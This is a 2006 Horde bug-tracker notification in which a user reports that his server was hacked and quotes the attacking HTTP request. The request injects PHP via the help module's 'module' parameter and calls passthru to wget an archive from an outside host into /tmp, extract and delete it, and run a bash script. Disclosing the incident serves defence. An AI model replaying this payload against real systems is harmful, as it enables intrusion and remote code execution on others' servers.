[Tickets #3805] NEW: hacked

bugs@bugs.horde.org bugs at bugs.horde.org
Thu Apr 20 16:52:13 PDT 2006


DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/?id=3805
-----------------------------------------------------------------------
 Ticket             | 3805
 Created By         | matt1 at clara.co.uk
 Summary            | hacked
 Queue              | Horde Base
 Version            | HEAD
 State              | Unconfirmed
 Priority           | 3. High
 Type               | Bug
 Owners             | 
-----------------------------------------------------------------------


matt1 at clara.co.uk (2006-04-20 16:52) wrote:

I just had my server compromised by the following:-

GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).
%22tmp;wget%20operteam.100free.com%22.chr(47).%22sex.tar;tar%20xvf%20sex.tar
;rm%20-rf%20sex.tar;cd%20,.;.%22.chr(47).%22bash%22);'. HTTP/1.1




More information about the bugs mailing list